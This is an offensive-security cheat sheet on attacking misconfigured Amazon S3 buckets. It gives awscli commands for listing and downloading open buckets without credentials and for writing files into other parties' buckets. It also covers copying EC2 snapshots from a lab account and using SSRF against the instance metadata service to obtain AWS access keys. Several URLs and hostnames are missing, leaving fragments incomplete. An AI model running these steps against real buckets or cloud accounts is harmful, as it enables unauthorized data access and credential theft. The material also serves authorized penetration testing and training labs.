Amazon Bucket S3 AWS


  • AWS Configuration

  • Open Bucket

  • Basic tests

    • Listing files

    • Move a file into the bucket

    • Download every things

    • Check bucket disk size

  • AWS - Extract Backup

  • Bucket juicy data

AWS Configuration

Prerequisites, at least you need awscli

sudo apt install awscli

You can get your credential here but you need an aws account, free tier account :

aws configure
aws configure --profile nameofprofile

then you can use --profile nameofprofile in the aws command.

Alternatively you can use environment variables instead of creating a profile.

export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ

Open Bucket

By default the name of Amazon Bucket are like[bucket_name]/, you can browse open buckets if you know their names[bucket_name]/

Their names are also listed if the listing is enabled.

<ListBucketResult xmlns="">

Alternatively you can extract the name of inside-site s3 bucket with %C0. (Trick from

eg: http://redacted/avatar/123%C0

Basic tests

Listing files

aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
aws s3 ls s3:// --no-sign-request --region us-west-2

You can get the region with a dig and nslookup

$ dig
;; ANSWER SECTION:    5    IN    A

$ nslookup
Non-authoritative answer: name =

Move a file into the bucket

aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
aws s3 cp login.html s3://$bucketName --grants read=uri=
aws s3 mv test.txt s3://
FAIL : "move failed: ./test.txt to s3:// A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."

aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"

Download every things

aws s3 sync s3:// . --no-sign-request --region us-west-2

Check bucket disk size

Use --no-sign for un-authenticated check.

aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'

AWS - Extract Backup

$ aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",

$ aws --profile profile_name ec2 describe-snapshots
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89",

Create a volume using snapshot
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89
In Aws Console -> EC2 -> New Ubuntu
$ chmod 400 YOUR_KEY.pem
$ ssh -i YOUR_KEY.pem

Mount the volume
$ lsblk
$ sudo file -s /dev/xvda1
$ sudo mount /dev/xvda1 /mnt

Bucket juicy data

Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting : will return the AccessKeyID, SecretAccessKey, and Token

For example with a proxy :


Last updated